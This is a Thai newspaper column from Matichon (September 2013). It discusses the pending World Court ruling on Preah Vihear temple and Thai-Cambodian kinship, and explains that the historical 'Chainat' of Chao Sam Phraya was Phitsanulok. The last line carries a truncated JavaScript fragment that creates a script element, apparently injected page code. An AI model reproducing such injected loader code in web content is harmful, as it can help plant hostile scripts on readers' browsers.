Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 18 กันยายน 2556

ปราสาทพระวิหาร มีวิกฤตรอข้างหน้า

          ดูเหมือนสังคมไทยวันนี้จะลืมไปแล้วว่ามี“วิกฤตการณ์เขาพระวิหาร”รออยู่ข้างหน้า

          ปราสาทพระวิหาร : ลืมแล้วหรือไร… ทำใจหรือยัง! สุรชาติ บำรุงสุข จึงเตือนไว้ในมติชนสุดสัปดาห์ (ฉบับประจำวันที่ 13-19 กันยายน 2556 หน้า 36) ถ้าผลตัดสินของศาลโลกออกมาไม่ถูกตรงใจผู้คนส่วนใหญ่ แล้วรัฐบาลจะทำอย่างไร?

          หนังสือ เมืองพระนคร นครวัด นครธม ฉบับพิมพ์ครั้งที่ 9 วางจำหน่ายขณะนี้ ปูพื้นความเข้าใจเพื่อลดอคติไว้แล้ว โดยขัดเกลาและปรับปรุงใหม่ทั้งหมด เพิ่มคำนำเสนอ เรื่องเครือญาติไทย-กัมพูชา

          คนไทยและความเป็นไทย มีส่วนผสมของหลายเผ่าพันธุ์ โดยมีลาวและกัมพูชาเป็นสายแหรกสำคัญปะปนอยู่ด้วย จึงนับเป็นเครือญาติชาติภาษาและชาติพันธุ์เดียวกัน

          เมืองพระนคร (ศรีอยุธยา) ในไทย กับเมืองพระนคร (นครวัด) และเมืองพระนครหลวง (นครธม) ในกัมพูชา เป็นบ้านพี่เมืองน้องเครือญาติอุปถัมภ์ใกล้ชิดมาแต่ยุคก่อนๆ โดยมีประวัติศาสตร์ความเป็นมาร่วมกันนับพันปีมาแล้ว

          มีพยานหลักฐานและคำอธิบายครบถ้วนในคำนำเสนอหนังสือเมืองพระนคร นครวัด นครธม

 

ชัยนาท มาจากไหน?

          อ. ประเทือง ไทยเขียว (ปราชญ์ชาวบ้าน สาขาวรรณศิลป์ จ.ชัยนาท) เข้าใจตามตำราเก่า ว่าเจ้าสามพระยา ครองเมืองชัยนาท หมายถึง จ. ชัยนาท ทุกวันนี้

          แต่หลักฐานพบใหม่ ไม่เป็นอย่างนั้น

          ผมขอสรุปย่อๆ จากหลักฐานที่นักปราชญ์ราชบัณฑิตค้นคว้าอธิบายไว้นานหลายปีแล้ว ดังนี้

          เจ้าอ้ายพระยา ครองเมืองสุพรรณบุรี คือ จ. สุพรรณบุรี

          เจ้ายี่พระยา ครองเมืองแพรกศรีราชา คือ อ. สรรค์บุรี จ. ชัยนาท

          เจ้าสามพระยา ครองเมืองชัยนาท (หรือเรียกอีกชื่อหนึ่งว่า เมืองสองแคว) คือ จ. พิษณุโลก

          ต่อมาสมเด็จพระบรมไตรโลกนาถ จากอยุธยา ขึ้นไปครองเมืองชัยนาท (เมืองสองแคว) แล้วเปลี่ยนนามเป็นเมืองพิษณุโลก

          ชื่อชัยนาทจึงโอนลงมาอยู่บริเวณชัยสถาน ย่านวัดพระบรมธาตุปากแม่น้ำน้อย ฝั่งขวาแม่น้ำเจ้าพระยา จ. ชัยนาท

          ท่านประธานฯ ขรรค์ชัย บุนปาน เพิ่งมอบหมายให้เรียบเรียง ชัยนาท มาจากไหน?

          ขณะนี้ผมกำลังสะสางต้นฉบับที่รับปากชาวบ้านชาวเมืองไว้หลายเรื่อง ต้องชุลมุนวุ่นวายอยู่คนเดียว เมื่อสะสางหมดจะลงมือเรื่องชัยนาท แต่ยังบอกไม่ได้ว่าเมื่อไร?var d=document;var s=d.createElement(‘script’); } else {